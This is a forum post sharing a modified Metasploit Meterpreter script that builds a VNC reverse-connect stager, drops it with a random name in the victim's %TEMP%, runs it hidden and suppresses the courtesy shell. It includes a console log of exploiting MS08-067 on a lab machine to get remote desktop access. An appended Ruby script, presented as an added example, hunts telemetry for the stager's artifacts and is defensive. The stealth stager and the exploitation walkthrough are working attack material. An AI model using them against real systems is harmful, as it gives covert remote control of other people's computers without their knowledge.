I've been testing the new vnc meterpreter script hdm just wrote, as per:
Twitter / HD Moore: RunVNC: quickly spawn a V ...
It works just fine. However, it pops a courtesy shell, so I added:

Code:
set DisableCourtesyShell TRUE

just before executing the exploit. The parameter was properly echoed. But the courtesy shell keeps showing.
Has anyone else tried this?
Edit. Possibly this is because it's a meterpreter script, not a payload. Just wondering if there's a command available to disable it.
Edit 2.
Ok, guys, flooded by replies
Nevermind, I modified the original script vnc.rb as follows:

Code:
# $Id: vnc.rb 7872 2009-12-15 05:10:33Z hdm $
#
# Meterpreter script for obtaining a quick VNC session
#

session = client

#
# Options
#
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "This help menu"],
  "-r" => [ true,  "The IP of the system running Metasploit listening for the connect back"],
  "-p" => [ true,  "The port on the remote host where Metasploit is listening (default: 4545)"],
  "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"]
)

#
# Default parameters
#
rhost    = Rex::Socket.source_address("1.2.3.4")
rport    = 4545
autoconn = true

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
  case opt
  when "-h"
    print_line(opts.usage)
    return
  when "-r"
    rhost = val
  when "-p"
    rport = val.to_i
  when "-D"
    autoconn = false
  end
end

#
# Create the agent EXE
#
print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
print_status("VNC stager executable #{exe.length} bytes long")

#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
print_status("Uploaded the VNC agent to #{tempexe} (must be deleted manually)")

#
# Setup the multi/handler if requested
#
if(autoconn)
  mul = client.framework.exploits.create("multi/handler")
  mul.datastore['PAYLOAD']       = "windows/vncinject/reverse_tcp"
  mul.datastore['LHOST']         = rhost
  mul.datastore['LPORT']         = rport
  mul.datastore['EXITFUNC']      = 'process'
  mul.datastore['ExitOnSession'] = true
  # My modification: the option has to be set on the handler the script
  # creates, not on the exploit module in the console.
  mul.datastore['DisableCourtesyShell'] = true
  mul.exploit_simple(
    'Payload'  => mul.datastore['PAYLOAD'],
    'RunAsJob' => true
  )
end

#
# Execute the agent
#
print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})

Then, saved as:

Code:
/pentest/exploits/framework3/scripts/meterpreter/vncstealth.rb

And tested it:

Code:
       =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 476 exploits - 220 auxiliary
+ -- --=[ 262 payloads - 22 encoders - 8 nops
       =[ svn r7893 updated today (2009.12.16)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.2:1035)

meterpreter > run vncstealth
[*] Creating a VNC stager: LHOST=192.168.1.6 LPORT=4545)
[*] VNC stager executable 87552 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\udoGvQNkBM.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
[*] VNC Server session 2 opened (192.168.1.6:4545 -> 192.168.1.2:1036)
meterpreter > Connected to RFB server, using protocol version 3.3
No authentication needed
Desktop name "VNCShell [SYSTEM@LAB-VICTIM] - Full Access"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding

It's bloody silent now. No pop-up courtesy shell.
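The script above leaves a predictable trail on the host: an executable named with 6 to 13 random letters in %TEMP% (Rex::Text.rand_text_alpha(rand(8)+6)), started hidden, then an outbound connection to LHOST:LPORT (4545 by default). The following added example, which is not part of the original post or of Metasploit, hunts for that pattern in process-creation and network-connection telemetry; the key=value log format and the sample events are constructed for the example, not a real Sysmon or EDR schema.

```ruby
# Added example (not from the post or Metasploit): hunt host telemetry for the
# artifacts a vnc.rb-style stager leaves behind: a 6..13 mixed-case-letter .exe
# dropped in %TEMP% whose pid then connects back out (default LPORT 4545).
# Log lines use a constructed 'KIND key=value' format, not a real Sysmon schema.
TEMP_DIRS = [
  %r{\A[a-z]:\\windows\\temp\\}i,
  %r{\A[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\}i,
].freeze

# Does the image path look like a rand_text_alpha(6..13) + ".exe" drop in a temp dir?
def suspicious_temp_exe?(image)
  return false unless image && TEMP_DIRS.any? { |re| image =~ re }
  base = File.basename(image.tr("\\", "/"))
  return false unless base =~ /\A[A-Za-z]{6,13}\.exe\z/   # letters only, right length, .exe
  stem = base[0..-5]
  !!(stem =~ /[a-z]/ && stem =~ /[A-Z]/)                  # rand_text_alpha mixes cases
end

# Parse one 'KIND key=value key="quoted value"' line into a hash.
def parse_event(line)
  kind, rest = line.split(" ", 2)
  fields = rest.to_s.scan(/(\w+)=("[^"]*"|\S+)/)
               .each_with_object({}) { |(k, v), h| h[k] = v.delete('"') }
  fields.merge("kind" => kind)
end

# One finding per suspicious process, with the outbound destinations its pid reached.
def hunt(lines)
  events   = lines.map { |l| parse_event(l) }
  conns    = events.select { |e| e["kind"] == "NETCONN" }
  suspects = events.select { |e| e["kind"] == "PROCESS" && suspicious_temp_exe?(e["image"]) }
  suspects.map do |p|
    dsts = conns.select { |c| c["pid"] == p["pid"] }.map { |c| c["dst"] }
    { pid: p["pid"], image: p["image"], callbacks: dsts }
  end
end

# Constructed sample telemetry; the first image name is the one from the post's output.
SAMPLE_LOG = [
  'PROCESS pid=1900 image="C:\WINDOWS\TEMP\udoGvQNkBM.exe" parent=svchost.exe',
  'PROCESS pid=1244 image="C:\WINDOWS\system32\notepad.exe" parent=explorer.exe',
  'PROCESS pid=2012 image="C:\WINDOWS\TEMP\setup.exe" parent=msiexec.exe',
  'NETCONN pid=1900 dst=192.168.1.6:4545',
  'NETCONN pid=1244 dst=10.0.0.5:445',
].freeze

if __FILE__ == $0
  hunt(SAMPLE_LOG).each { |f| puts "pid #{f[:pid]} #{f[:image]} -> #{f[:callbacks].join(', ')}" }
end
```

The file is never deleted by the script ("must be deleted manually"), so the same name check also works on a file-system sweep of the temp directories after the fact.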